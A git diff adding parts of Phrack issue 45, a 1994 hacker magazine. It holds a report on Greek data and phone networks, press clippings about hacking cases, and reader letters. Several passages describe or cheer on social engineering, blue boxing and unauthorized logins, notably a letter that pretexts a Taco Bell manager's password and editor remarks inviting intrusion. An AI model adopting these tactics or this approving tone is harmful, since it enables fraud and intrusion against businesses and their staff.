+ 1.  Dial access number:
+          1161 for both 300 and 1200 bps.  Additionally, the
+          following access numbers are available within Athens:
+          8848481, 8849021, and 3477699.
+ 2.  Upon connection, the user types three dots and Enter or Return:
+          ... (CR)
+ 3.  The network will respond
+          :  HELLASPAC
+     If no response, repeat step 2.
+ 4.  Upon receipt of the network prompt, the user types (in capital letters):
+          NXXXX - 0 WWWW (CR)
+     where XXXX is the user's NUI and WWWW is the NUA.
+ 5.  HELLASPAC will answer
+          :  COM
+ 6.  To log off, type
+          (CTRL)PCLR(CR)
+     The network will respond
+          CLR CONF
+
+ Until the end of the year a free experimental 2400bps ( 1200 baud + MNP 5 )
+dial up public service will be operating at 0961-11111 (if you call this a
+2400 baud NUI, shame on you!  You know who you are :-) ). 0961-22222 will
+lead to HellasTel ( Video Text ).  Can't tell if foreigners can call these
+numbers.
+
+
+ SERVICE: ARIADNET
+
+ Ariadnet is a Hellenic research/academic network sponsored by the European
+Community. There are two main hosts: LEON and ISOSUN. The first one serves
+the public; dial-ups, low cost (10.000 drg for three months), yet low disk
+quota (starts from 1 MB) due to "the workstation's incapability to carry
+a lot of hard disks". The second one serves users who call from other
+sources (i.e. PSDNs). Thanks to Ariadnet most universities provide free
+internet access (usually they reach 1 KiloByte per second) in conjunction to
+restricted HellasPac access (a.k.a. high expenses).
+
+The following captures will talk by themselves.
+
+**
+
+ISOSUN @ ARIADNE     hellenic research/academic  network
+login: help
+Last login: Wed Mar 18 19:37:13 from 38212026
+SunOS Release 4.0.3_EXPORT (ARIADNE.FEB2) #1: Thu Feb 13 13:04:45 EET 1992
+
+Please, do not leave your mail in mailing queue for a long time.
+Clean them up often. Otherwise your mail may be lost....
+
+thanks
+postmaster
+
+        A R I A D N E T - X.121 server
+
+Demokritos
+
+isosun SUN:INTERNET,X400-R&D-MHS             10100101, leon 10100102
+PRIME 9950 primos: EARN-BITNET               10100100, gatos 10100104
+mVAX  DECNET-CERN (cluster)                  10100103, KE-lab 10100108
+EIE mVAx                                          101002005
+EKT Data Bases PERKIN-ELMER                       10100200
+Kapodistriako Pan.CYBER-NOS        10100401, mVAX 10100402
+Aristotelion Pan.      mVAX    13100104, unix 386 13100108,
+Metsovion Polytechnion
+     vms-mvax                   1010030107, sun 1010030106
+     High Energy Lab                              10100351
+Gen.Secr. Research UNIX V   1010050008, sequent 1010050007
+ITY Pan. Patra,  CTI  unix server                 16100101
+ATE Pan. Crete , FORTH                            18100100
+ASSOE(Athens U. of Economics)  VAX/VMS            10100600
+NATIONAL OBSERVATORY  VAX/VMS                     10100700
+Rethimno Pan Kritis/Economics-Philosophy          38312025
+Chania Poly. Kritis                               38212026
+ZENON,INTRAKOM,ATKO, HITEC, PLANET via X25 and TCPIP/X25
+ATDP6519905
+ATDP6533172  V21/V22 MODEM hayes, no parity, 1 stop bit, 8 data
+connect to ARIADNET pad service @ Demokritos
+HELLASPAC Gateway, IXI Gateway, X400 Gateway, Internet Gateway
+
+INFORMATION: +301 6513392 FAX: 6532175
+TEAM: Y.Corovesis,A.Drigas,T.Telonis (+4 students)
+ADMINISTRATION: A.Arvilias tel:+301 6515224
+NEXT:  TEI-Pirea, EMY, NTUA-physicslab, Thessaloniki VAX9000
+
+**
+
+
+* Phone Network
+
+
+ The last four years or so, the old analog switching centers (HDW, Rotary,
+Crossbar) are being replaced with digital ones (Ericsson-Intracom AXE-10
+and Siemens EWSD).  Theoretically that should be completed by the end of 1994
+(according to the Christian way of chronometry).
+
+ These provide the following for the masses:
+
+    PAGING (was operating anyway)
+    HOT LINE
+    "WAKE-UP" SERVICE
+    ABBREVIATED DIALLING
+    THREE PARTY SERVICE
+    CALL WAITING
+    "DOT NOT DISTURB" SERVICE
+    OUTGOING CALL BARRING
+    MALICIOUS CALL IDENTIFICATION
+    ABSENT SUBSCRIBER SERVICE
+    LINE HUNTING
+    TOLL TICKETING (sure they do!)
+
+ ...and of course better control OF the masses FOR the state.
+
+ I got very interesting results exploring those new centers. If I ever finish
+the project it will appear in Phrack or UPi (hopefully). Damn...Better to
+think over that twice.  Abusing raises eyebrows.
+
+ The country direct numbers use the 00-800-country code-11 format. Believe it
+or not; I had to social engineer the directory assistance operator to start
+moving.  Not to mention the time and examples he needed to understand what I
+was talking about. Bad luck?
+
+     FINLAND                00-800-358-11
+     CYPRUS                 00-800-357-11
+     ICELAND                00-800-353-11
+     BRITAIN/NORTH IRELAND  00-800-44-11
+     SWEDEN                 00-800-46-11
+     HOLLAND                00-800-31-11
+     NORWAY                 00-800-47-11
+     DENMARK                00-800-45-11
+     FRANCE                 00-800-33-11
+     GERMANY                00-800-49-11
+     M.C.I.                 00-800-122155
+                            00-800-1211
+     SPRINT                 00-800-1411
+     AT&T                   00-800-1311
+
+ As of now only U.S.A. direct numbers can be used for blue boxing. It was
+possible to do so and it should be possible nowadays, although I cannot
+confirm that.  The last months I have spent A LOT of time scanning numbers
+and frequencies but I didn't come to an end.  To be continued...
+
+
+* Cellular Phone Networks
+
+
+ The pen-European digital (shit!) mobile telephony system G.S.M. is being
+implemented. Nothing is solid yet and of course no one claims (trumpet fanfare
+added here) that phreaks out through that. In the first state PANAFON will
+cover Athens and Argosaronic and afterwards all the big cities: Thessaloniki
+(it should be functioning by now), Patra, Heraklio et cetera. They are planning
+to cover more than 90% of the country's residents and 75% of the geographical
+region. Problems appear thanks to the strange terrain. I don't know what is
+going on with TELESTET.
+
+ The total registered subscribers are considered to be about ten thousand.
+
+
+* Miscellaneous
+
+
+ An Integrated Service Digital Network is being established and local
+universities are installing [optical] Fiber Distributed Data Interfaces.
+PBXs are now becoming popular.
+
+ Most operators know little or nothing on computer security or managing in
+general. That's why some of them accept offered help and provide afterwards
+(non-privileged) accounts and old, yet valuable, duplicate manuals. If some
+anti-hacking measurements are taken, that is thanks to the company employers
+who maintain and prepare the systems.
+
+ Do not hang on this, but I think that there are no laws concerning H/P in
+particular.
+
+ Needless to say that no conferences take place. Of course QSD & IRC...ohhh
+fuck it.
diff --git a/phrack45/28.txt b/phrack45/28.txt
new file mode 100644
index 0000000..6a75e06
--- /dev/null
+++ b/phrack45/28.txt
@@ -0,0 +1,365 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 28 of 28
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+
+Paramount's Hack Attack                                      March 3, 1994
+~~~~~~~~~~~~~~~~~~~~~~~
+Reuter News Wire
+
+Though the minds of Paramount execs have surely been n potential whackings,
+computer hacking was the chief focus of execs Bob Jaffe and John Goldwyn
+last week.
+
+The execs got Par to pay a low six-figure fee against mid-six figures to
+Johnathan Littman for the rights to make a movie from his Sept. 12 LA Times
+Magazine article "The Last Hacker," and major names are lining up to be
+involved.
+
+It's the story of Kevin Lee Poulsen, a skilled computer hacker who was so
+inventive he once disabled the phone system of KIIS_FM so he could be the
+102nd caller and win the $50,000 Porsche giveaway.
+
+Poulsen was caught and has been in jail for the last three years, facing
+more than 100 years in prison.
+
+It was a vicious tug of war between Touchstone, which was trying to purchase
+it for "City Slickers" director Ron Underwood.
+
+Littman, meanwhile, has remained tight with the underground community of
+hackers as he researches his book.
+
+That takes its tool.  Among other things, the mischief meisters have already
+changed his voice mail greeting to render an obscene proposal.
+
+------------------------------------------------------------------------------
+
+Hacker Attempts To Chase Cupid Away                      February 10, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+UPI News Sources
+
+Two bachelors who rented a billboard to find the perfect mate said Thursday
+they had fallen victim to a computer hacker who sabotaged their voice mail
+message and made it X-rated.
+
+Steeg Anderson said the original recording that informed callers
+how they may get hold of the men was changed to a "perverted" sexually
+suggestive message.
+
+"We are getting calls from all over the country," he said.  "So we were
+shocked when we heard the message.  We don't want people to get the wrong
+idea."
+
+"It's rare, but we've seen this kind of thing before," said Sandy Hale, a
+Pac Bell spokeswoman.  "There is a security procedure that can prevent this
+from happening, but many people simply don't use it."
+
+------------------------------------------------------------------------------
+
+Wire Pirates                                                    March 1994
+~~~~~~~~~~~~
+by Paul Wallich (Scientific American) (Page 90)
+
+Consumers and entrepreneurs crowd onto the information highway, where
+electronic bandits and other hazards await them.
+
+[Scientific American's latest articles about the perils of Cyberspace.
+ Sound bytes galore from Dorothy Denning, Peter Neumann, Donn Parker,
+ Mark Abene, Gene Spafford and others.  Much better than their last attempt
+ to cover such a thing back in 1991.]
+
+
+------------------------------------------------------------------------------
+
+AT&T Warns Businesses                                     December 8, 1993
+~~~~~~~~~~~~~~~~~~~~~
+Business Wire Sources
+
+AT&T urges businesses to guard against increased risk of toll-fraud attempts
+by hackers, or toll-call thieves, during the upcoming holiday season.
+
+Last year nationwide toll-fraud attempts increased by about 50 percent during
+the Christmas week.  Hackers "break into" PBXs or voice-mail systems, obtain
+passwords or access to outside lines, and then sell or use the information to
+make illegal international phone calls.
+
+Toll fraud cost American businesses more than $2 billion in 1993.  "Hackers
+count on being able to steal calls undetected while businesses are closed
+during a long holiday weekend," says Larry Watt, director of AT&T's Toll
+Fraud Prevention Center.  "Tis the season to be wary."
+
+AT&T is the industry leader in helping companies to prevent toll fraud.
+Businesses that want more information on preventative measures can request
+AT&T's free booklet, "Tips on Safeguarding Your Company's Telecom Network,"
+by calling 1-800-NET-SAFE.
+
+------------------------------------------------------------------------------
+
+Sadomasochists Meet Cyberpunks At An L.A. Party              June 14, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Jessica Seigel (Chicago Tribune)
+
+Sadomasochists meet the cyberpunks.  Leather meet hypernormalcy.  Body
+piercing meet network surfing (communicating by computer).  It was a night
+for mingling among the subcultures to share their different approaches to
+messing with mind and body.
+
+The recent party at the S&M club "Club Fuck" was organized by "Boing Boing,"
+a zine that focuses on the kinetic, futuristic world of the new frontier
+known as cyberspace.  This place doesn't exist in a physical location, but
+anyone can visit from their home computer by hooking into vast electronic
+networks.
+
+A blindfolded man dressed in a jock strap and high heeled boots stood on
+stage while helpers pinned flashing Christmas lights to his flesh with thin
+needles.  Then a man with deer antlers tied to his forehead whipped him.
+
+The crowd of mostly twentysomethings who came to the club because of the
+cyber theme observed with stony expressions.  Chris Gardner, 24, an
+architecture student who studied virtual reality in school, covered his
+eyes with his hand.
+
+No one, really was "fitting in."  The sadomasochists looked curiously at the
+very-average-looking cyber fans, who openly gawked back at the black
+leather, nudity and body piercing.
+
+Sharing subcultures can be so much fun.
+
+------------------------------------------------------------------------------
+
+Intruder Alert On Internet                                February 4, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+AP News Sources
+
+Intruders have broken into the giant Internet computer network and users are
+being advised to protect themselves by changing their passwords.
+
+The breaks-ins may jeopardize the work of tens of thousands of computer
+users, warned the Computer Emergency Response Team, based at Carnegie
+Mellon University in Pittsburgh.
+
+"Intruders have already captured access information for tens of
+thousands of systems across the Internet," said an emergency response
+team sent out on the network late Thursday.
+
+Passwords were obtained by the intruders using a "Trojan horse
+program," so called because it can enter the main computer for some
+legitimate purpose, but with coding that lets it remain after that
+purpose is accomplished.
+
+The program then records the first 128 keystrokes when someone else
+connects to the Internet, and the illegal user later dials in and
+receives that information. The first keystrokes of a user generally
+contain such information as name and password of the user. Once they
+know that the intruders can then sign on as the person whose password
+they have stolen, read that person's files and change them if they
+wish.
+
+------------------------------------------------------------------------------
+
+Harding Email Compromised by Journalists                 February 27, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by C.W. Nevius (SF Chronicle)
+
+In another example of the media circus that has dogged Tonya Harding,
+a number of American journalists have apparently obtained the secret computer
+code numbers that would allow them to read Harding's personal electronic mail
+at the Winter Olympics.
+
+No reporters have admitted reading Harding's electronic mail, but the
+apparent access to private communications has caused concern among those
+covering the Games.
+
+The Olympic computer system is one of the most popular communications devices
+at the Games.  Any member of the Olympic family -- media, athlete or Olympic
+official -- can message anyone else from any of several hundred
+computer terminals all over the Olympic venues.
+
+The flaw in the system is that it is not especially difficult to
+break the personal code.  Every accredited member of the Olympic family is
+given an identification number.  It is written on both the front and back
+of the credential everyone wears at the Games.  Anyone who has a face-to-face
+meeting with an athlete would be able to pick up the accreditation number,
+if the person knew where to look.
+
+Each person is also given a "Secret" password to access the communication
+system.  At the outset, the password was comprised of the digits corresponding
+to that person's birth date.  Although Olympic officials advised everyone
+to choose their own password, Harding apparently never got around to doing
+so.
+
+Harding's initial password would have been 1112, because her birthday
+is the 11th of December.
+
+Although none of the writers at the Olympics has admitted reading Harding's
+personal electronic mail, it would be difficult, if not impossible, to
+determine if anyone did any actual snooping.  There are no records kept
+of who signs on to the computer from any particular terminal.
+
+------------------------------------------------------------------------------
+
+Reality Check                                                 January 1994
+~~~~~~~~~~~~~
+by Doug Fine (Spin) (Page 62)
+
+I ask accused hacker Kevin Lee Poulsen if, as he approaches three years in
+jail without trial, he has any regrets about his computer-related activities.
+Without missing a beat, and breaking a media silence that began with his
+first arrest in 1988, he answers: "I regret shopping at Hughes Supermarket.
+I'm thinking of organizing a high-tech boycott."
+
+Poulsen is referring to the site of his 1991 bust in Van Nuys, California.
+There, between the aisles of foodstuffs, two zealous bag-boys -- their resolve
+boosted by a recent episode of Unsolved Mysteries that featured the alleged
+criminal -- jumped the 25-year-old, wrestled him to the ground, and handed
+the suspect over to the security agents waiting outside.
+
+Poulsen still kicks himself for returning to Hughes a second time that
+spring evening.  According to court documents, a former hacker crony of
+Poulsen's, threatened with his own prison sentence, had tipped off the
+FBI that Poulsen might be stopping by.
+
+What, I ask him, had he needed so badly that he felt compelled to return
+to a supermarket at midnight?
+
+"Do you even have to ask?" he says. "Condoms, of course."
+
+[A very different Kevin Poulsen story.  Get it and read it.]
+
+------------------------------------------------------------------------------
+
+Key Evidence in Computer Case Disallowed                   January 4, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Los Angeles Staff Writers (Los Angeles Times) (Page B3)
+
+U.S. District Judge Ronald Whyte in San Jose said computer tapes found
+in a storage locker rented by Kevin Lee Poulsen should not have been
+examined by prosecutors without a search warrant and cannot be used as
+evidence.
+
+Whyte had ruled the tapes admissible last month but changed his mind,
+saying he had overlooked evidence that should have put a police officer
+on notice of Poulsen's  privacy rights.
+
+In addition to illegal possession of classified government secrets,
+Poulsen faces 13 other charges, including eavesdroping on telephone
+conversations, and tapping into Pacific Bell's computer and an unclassified
+military computer network. He could be sentenced to 85 years in prison if
+convicted of all charges.
+
+His lawyer, Paul Meltzer of Santa Cruz, said the sole evidence of the
+espionage charge is contained on one of the storage locker tapes. Meltzer
+said a government analyst found that the tape contained a 1987 order,
+classified secret, concerning a military exercise.
+
+Poulsen, who lived in Menlo Park at the time of his arrest in the San
+Jose case, worked in the mid-1980s as a consultant testing Pentagon computer
+security. He was arrested in 1988 on some of the hacking charges, disappeared
+and was picked up in April, 1991, after a tip prompted by a television show.
+
+------------------------------------------------------------------------------
+
+Hacker to ask charges be dropped                           January 4, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+UPI News Sources
+
+An attorney for a former Silicon Valley computer expert accused of raiding
+confidential electronic government files said Tuesday he will ask to have
+charges dismissed now that a federal judge has thrown out the government's
+chief evidence.
+
+Attorney Peter Leeming said the government's case against Kevin L.
+Poulsen is in disarray following a ruling suppressing computer tapes and
+other evidence seized from a rented storage locker in 1988.
+
+''We're ready to go to trial in the case, and actually we're looking
+forward to it,'' Leeming said.
+
+Poulsen is charged with espionage and other offenses stemming from his
+hacking into military and Pacific Bell telephone computers. The government
+alleges that  Poulsen illegally obtained confidential military computer codes
+and confidential information on court-ordered wiretaps.
+
+------------------------------------------------------------------------------
+
+The Password is Loopholes                                    March 1, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~
+by Joshua Quittner (Newsday) (Page 61)
+
+You'd think that Polytechnic University, in Brooklyn, one of the finer
+technical schools in the country, would know how to safeguard its
+computer system against hacker intrusions. And you'd think the same of
+New York University's Courant Institute, which hosts the mathematical
+and computer science departments.
+
+But a teenage Brooklyn hacker, who calls himself Iceman, and some
+of his friends say they invaded the schools Internet-connected
+computers and snatched the passwords of 103 students.
+
+Internet break-ins have been a national news story lately, with
+reports that unknown intruders have purloined more than 10,000 passwords
+in a burst of activity during recent months. The Federal Bureau of
+Investigation is investigating, since so many "federal-interest
+computers" are attached to the wide-open Internet and since it is a
+crime to possess and use other peoples' passwords.
+
+Experts now believe that a group of young hackers who call
+themselves The Posse are responsible for the break-ins, though who they
+are and what they're after is unclear. Some people believe the crew is
+merely collecting passwords for bragging rights, while others suspect
+more insidious motives. Their approach is more sophisticated, from a
+technical standpoint, than Iceman's. But the result is the same.
+
+Now Iceman, who's 18, has nothing to do with The Posse, never heard
+of it, in fact. He hangs with a group of budding New York City hackers
+who call themselves MPI.
+
+Iceman told me it was simple to steal 103 passwords on the
+universities systems since each password was a common word or name.
+
+What did Iceman and company do with the passwords?
+
+He said mostly, they enjoy reading other people's files and e-mail.
+"Every once in a while," he said, "you get something interesting."
+
+------------------------------------------------------------------------------
+
+A Rape In Cyberspace                                     December 21, 1993
+~~~~~~~~~~~~~~~~~~~~
+by Julian Dibbell (Village Voice) (Page 36)
+
+[<SNIFF>  Some guy made my MUD character do bad things in a public
+ area.  And all the other MUDders could do was sit and watch!  WAHHHHH.
+
+ Get a fucking life, people.  Wait, let me restate that; Get a
+ FUCKING REAL LIFE!]
+
+------------------------------------------------------------------------------
+
+Hacking Goes Legit                                        February 7, 1993
+~~~~~~~~~~~~~~~~~~
+by Ann Steffora and Martin Cheek (Industry Week) (Page 43)
+
+Corporations ARE using "tiger teams" and less glamorous methods to check
+computer security.
+
+[Uh, yeah.  Sure they are.  Hey, is that an accountant in your dumpster?
+ Better tuck in that tie dude.  Don't forget your clipboard!
+
+ I will put a computer security audit by me, or by anyone from the hacker
+ community, against a computer security audit done by ANY of the following:
+ Coopers & Lybrand, Deloitte & Touche, Arthur Andersen or Price Waterhouse.
+ It's no contest.  These people are NOT computer people.  Period.
+
+ Get the hell out of the computer business and go do my fucking taxes.]
+
+------------------------------------------------------------------------------
diff --git a/phrack45/3.txt b/phrack45/3.txt
new file mode 100644
index 0000000..8dc1736
--- /dev/null
+++ b/phrack45/3.txt
@@ -0,0 +1,841 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 3 of 28
+
+****************************************************************************
+
+                           Phrack Loopback Part II
+
+How sad the state of affairs is.  Companies do _not_ care about
+security.  My father would be the last one to think about ways
+into the "systems" that are out there.  We had a good talk tonite
+about the lack of security in the corporate world.  I told him
+about PGP public key encryption software, and it's political
+gibberish etc.  Then he hits me with this outstanding story of
+the stupidity displayed at his credit union (AEA, yes he works in
+the silicon valley).  He went to get some $$ at the branch office
+near his work, and he notices they have upgraded their computer
+systems.  It was apparent that it was no 'internal' updating of
+the tellers' equipment, but a major overhaul of the entire
+structure at AEA credit union.  This was obvious when every teller
+was reading manuals as they helped customers.  The greatest part
+of his story (which made him laugh out loud) was that on the tellers'
+computer screens were taped up pieces of paper detailing how to
+access the computers at AEA.  As the teller was in the back room,
+my dad leaned over and saw what it was, and memorized the things.
+Its the things like that which make me want to trust my money to
+fabulous behemoths like credit unions.
+
+[That's typical.  You should have gone straight to that bank and taken notes.
+ You never know...you could have ended up with SWIFT access.  Let's face it,
+ if the BND's Project Rahab can, so can we.]
+
+------------------------------------------------------------------------------
+
+     TO:  The Hack/Phreak Community
+   From:  Amitech USA
+Subject:  Explaining About What Amitech USA IS!
+
+     Amitech is a group that teaches and learns... What I mean by this is
+The Hack/Phreak community should teach the inexperienced more than put them
+down, especially if they want to learn but no one is willing to teach
+them.. This is were we come in... The definition of Hacking is learning the
+holes in different telephone equipment and different computer equipment.
+People these days don't use there knowledge correctly... They abuse what
+they get and sometimes even harass people because of hatred and
+reasons of revenge.. The H/P community isn't about this... We are releasing
+this to invite anyone in the H/P community with a lot or little experience
+to join us, to learn and to teach us..
+
+     Amitech USA does not condone any board crashing, harassing,
+Underground Board password stealing etc. We will not be responsible or
+accept anyone who condones such activity....
+
+     Amitech has two levels of members.. 1. Trial members 2. Regular
+members. The trial members are on a basis of two weeks which in such time
+they have to show us that they are willing to learn and is not into the
+group just to use the groups name in there signature. Members decide who
+is acceptable for a group and who is not. Each member will get the users
+application except their real name and phone #. We will decide and will
+contact you within a week of when the application comes to me...
+
+     We are going to be mostly underground for the simple fact that the
+group does not need recognition. Are members may stand out but for the
+most part we will not be shown and or do not want to be shown for the
+simple fact that underground is better for the newer user as will as the
+older users.
+
+     Please send all applications to Either burntkid@spiff.gnu.ai.mit.edu
+or The Crime Scene 516-873-8903...Anyone who wants information may send a
+message. Anyone interested in joining please fill out the application below.
+
+First Name:               Handle:
+
+Phone #:                  How many years experience:
+
+Specialties:             Boards you're on:
+
+Email/Internet:
+
+Please Spread This Message Around...
+
+[Good luck with your group.  And remember, when you're a group, you're
+ subject to prosecution under RICO.  God Bless America.]
+
+------------------------------------------------------------------------------
+
+Dear Phrack:
+
+        I know you guys take an interest in what happens at 2600
+meetings, so I thought you might like to hear about a mainstay of the
+Washington D.C. meeting.   BTW, I am also submitting to 2600.  (They
+should have a PGP key)
+
+------ Cut ----
+        For the past few meetings a guy from MCI has showed up.  He
+works at some sort of Pentagon City mall branch of MCI and on the Fridays
+he sticks around and gets drunk.  He is usually a great source of
+entertainment and this time he was undoubtedly the best part of the 2600
+meeting.  That was the highest form of entertainment (except for the
+threats on The Monk's life).  At a meeting before this he was saying
+(I'm not sure how many beers he had had) how he was going to bomb
+(physically) all the hackers computers by using the system batteries.
+And he also said something like "We didn't have time for this kind of
+stuff in Vietnam."  Anyway, I was listening to his drunken ramblings and
+I was thinking "I should be writing his wisdom down."  So I did, and
+Maverick later started to type it down.  The hardest part of all of this
+was not laughing in his face.   Here is where I started the notes:
+
+MCI Guy:  I mean it's really small, it's only like 1 microliter long.
+Vance:    Yeah, that's pretty short.
+MCI Guy:  I work on computers and they go in nanoseconds.
+Vance:    Nanoseconds are really short.
+MCI Guy:  A nanosecond is about this long.
+          < Denotes with his fingers a length of about 6 inches >
+Vance:    That's great if you can visualize it.
+MCI Guy:  Yeah, it's short.  Most of the instructions that I do take
+          less than 3 nanoseconds, and that's short.  But it's still too
+          slow.
+
+---  Ok, from here it somehow jumped to a discussion of Rebel Lion's
+     modem that was sitting out:
+
+MCI Guy:  That's a good modem, it has memory because of it's external
+          capacitance.  The capacitor can store the memory since it's
+          outside.
+Vance:    Yeah, it must have a lot of memory.  How much would you say?
+MCI Guy:  A lot, gigabytes of it.  The computer can talk directly to it.
+Vance:    You need software to access that, that's where the
+          intelligence is, in 2 gigabyte capacitor technology software.
+MCI Guy:  It's because it's outside and it has it's memory.
+Vance:    Gigaboobs of memory.  Megamammaries.   It must have
+          Megamammaries in it's external capacitance.
+
+--  At this point, everybody is cracking up, I can't believe Vance kept
+    a straight face.
+
+MCI Guy:  Yeah.  < Looking confused. >
+
+
+-------------------------------------------------------------------------
+-- After this, I was really laughing and wasn't sure of exactly what was
+   said.  But in just a few minutes, the MCI guy left to get some more
+   beer.  He didn't come back to our table, he went to another one.  We
+   ignored him for awhile.  But as he was sitting there, a woman sat down
+   next to him.  She was undoubtedly a prostitute, and there were many
+   cracks about her gigaboobs and megamammaries.  She must have spotted
+   the fact that he was wasted and was trying to make some easy cash.
+   After a while, the MCI guy didn't bite, and her pimp came along and
+   picked her up.   (There is no other logical explanation that I can
+   think of.)  After a few minutes, we went back to the table for the
+   final round, but Vance had left, so I conducted the search for
+   knowledge.  It starts as I was approaching the table and trying to get
+   him to talk to me.
+
+GD:       When you were talking Rebel Lion's modem, I wasn't quite sure
+          of what you said, could you explain it to me?
+          < I get out my pencil and paper, like I'm taking notes on his
+          every word. (Actually I was) >
+MCI Guy:  < He is giving me a look of utter contempt, like I'm just a
+          stupid kid who is not worthy to partake in his knowledge >
+          Well you see it's external.
+GD:       What do you mean?  It's obviously external, but what does that
+          mean?  < Gives me another look >
+--- Maverick accidentally spills some of Mr. MCI's beer.
+MCI Guy:  What was that?  What are you doing?!?
+Maverick: I didn't do anything, you spilled it!
+MCI Guy:  < Just forgets about it in his drunken stupor >
+          It has it's own memory, it doesn't have to take up the core
+          like an internal.
+GD:       Core?
+MCI Guy:  Or something like that, you know.  It's outside the main
+          frame.
+GD:       Right, so it saves memory.
+MCI Guy:  Hmmph, I work with so much memory.  I throw out tapes.
+GD:       Tapes?  You mean tape backups.
+MCI Guy:  Yeah.
+GD:       Why?  Don't you want the memory?
+MCI Guy:  I have too much memory.
+GD:       Yeah, I guess you're right, if you have too much memory, it is
+          hard to get rid of.
+MCI Guy:  I even use records.
+GD:       You mean like the spinning kind of records?  On a turntable?
+MCI Guy:  Yeah, they hold a lot of memory.
+GD:       Why don't you use CD's?  They hold a lot more you know.
+MCI Guy:  No they don't, you don't even know.
+GD:       So you are saying that records hold more than CD's?
+MCI Guy:  Yeah, and I can save space on records, I use "shrinker".  It
+          shrinks the space on a record.
+GD:       You mean shrink the space on one of those spinning records?
+          < I was trying too hard to keep from laughing to speak
+          articulately >
+MCI Guy:  It saves space by shrinking everything, and I can fit
+          more on it.
+GD:       Yeah, I guess that is a good idea.
+MCI Guy:  < Incredulous at my stupidity >
+          Do you even know about comp?
+GD:       Comp?  Sorry, I've never heard of "comp".  What is it?
+MCI Guy:  It's bits and bytes.
+GD:       Keep on going, I want to learn about this.
+          < And boy did I >
+MCI Guy:  4 bytes make a bit, 2 bytes make a double word, 2 words make a
+          double word.
+GD:       2 words make a double word?   Isn't that obvious since 2 means
+          double?
+MCI Guy:  < Ignoring me >
+          It's called 32 bits.  Above that you have to deal with 36 bits.
+GD:       Ok, I get it.  That's pretty cool.
+MCI Guy:  That's called the IBM logo.
+GD:       The IBM logo?   It's made up of bits and bytes and comp?
+MCI Guy:  Yeah, if you go above or below the line.
+
+---  Ok, at this point I was reeling from the bit-byte-word conversions
+and I didn't even want to try pursuing the "line" question since I had
+to leave.  I really wish I could have stayed, but I also don't know how
+long he would have been benign; this guy was drunk and still had 2
+large beers in front of him.
+
+        All through this time, people were cracking up and laughing
+in his face.  It wasn't that hard for the guy currently talking to him
+to not laugh, but when you thought for a second about this guy's slurred
+speech and his look of superiority, it was damn hard not to laugh.  And
+how sad is this guys life?  He comes to a mall to get drunk!  It
+must cost him $15 for those beers.  Oh well, maybe we will spring for
+some grain alcohol next time so we can get him to say even more.
+
+        Last thing, if you are talking to a guy like this.  Don't do
+what I did, don't confront him.  You won't get as much out of him.  Do
+what Vance did; agree with everything he says.  This will get him more
+comfortable and he will talk more.  Then give a summary of everything he
+said, while inserting things like "megamammaries" and "gigaboobs".
+
+-- Disclaimer:  I tried to be as accurate as possible but there were
+some small changes made because I couldn't remember the exact wording.
+But overall this is fairly true to life.
+
+[I've noticed that everyone I've ever met involved with LE or security
+ at corporations drinks and drinks and drinks and drinks.  And drinks.
+ What's with that?  Jesus...no wonder they are so slow to react.  They
+ are fucking hammered all the time.  They need to invest in some
+ stimulants.  Swap that Gin & Tonic for a handful of Ephedrine or something.
+ (Notice I said Ephedrine...gotta stay legal, eh?) ]
+
+------------------------------------------------------------------------------
+
+
+ Dear Phrack,
+
+  I am Knightkrawler.  About a month ago Mephisto, a fellow hacker friend of
+ mine, discovered a dialup for a Taco Bell computer while scanning some
+ numbers.  Just for the hell of it, I called up the Taco Bell manager and
+ posed as the Sys Admin.  THE PHUCKER FELL FOR IT!!!!!!
+
+ Conversation
+ ^^^^^^^^^^^^
+
+ me: Hi, I'm the SYS Admin for The Taco Bell Login.  My staff and I will be
+ running some routine diagnostics for the next week.  I'll need a passwd and
+ login name to enter the system.
+
+ Corey (the manager): Sure! My passwd is 1A2B3C, and my login name is Corey.
+
+ me: Thank you. If you need anything, you know where to reach me.
+
+ END
+ ^^^
+
+ WHAT A DUMBASS!!! I was able to log on and Change fuckin' payrolls!!!!
+ First thing I did was to change the price of tacos to 5 cents a piece!
+
+  What I want to know is, have any of you out there had any similar
+ experiences with bastards like these? Are all restaurant managers so
+ lame?
+
+                               L8R,
+                                -=KnIgHtKrAwLeR=-
+
+
+[The Taco Bell SCO's have been a source of amusement for some time.
+ It would appear that all restaurants in the PepsiCo chain have
+ SCO's in-house.  Something to keep in mind.
+
+ And, uh, I've never seen anything that you could do like "change prices"
+ without special terminal emulation.  So, uh, don't bullshit a bullshitter.
+ But, hey, it's a funny hack, and there are several in every city to
+ play with, if you are so inclined.]
+
+------------------------------------------------------------------------------
+
+ Hello there, I was wondering if you could help me (wait, wait,
+hear me out!).  I am looking for some up-to-date info on COSMOS.  I've read
+all of the Phrack articles, yours in ish 31 was particularly good, and I was
+wondering if there have been any developments lately that I should be aware
+of?
+ Basically, I am looking for a manual that will show me how to use
+COSMOS.  Kind of like a DOS reference guide or something similar.  Your
+article was dated 1990, almost 4 years ago, and I'm sure there have been
+some new things introduced since then.
+ I was thinking that if you had the raw info, you could pass it
+along to me and I could whip up a readable format for the next issue of
+Phrack.  Believe me, I've got far too much time on my hands.  I love Phrack
+and would do anything to help out!  Anyway, I'll cut this off here before I
+waste too much of your time.
+
+Mr. Wizard
+
+[COSMOS is being phased out.  I would suggest you look for info on
+ SWITCH.  There have been some articles on it in 2600, so you may want
+ to check some back issues.  Otherwise, I'll see if I can't get some
+ more detailed articles on its use for future Phrack issues.
+
+ But as far as COSMOS goes, I think my article from a few years back ended
+ up as the most complete ever done, so I doubt there are any others that
+ covered things I didn't.]
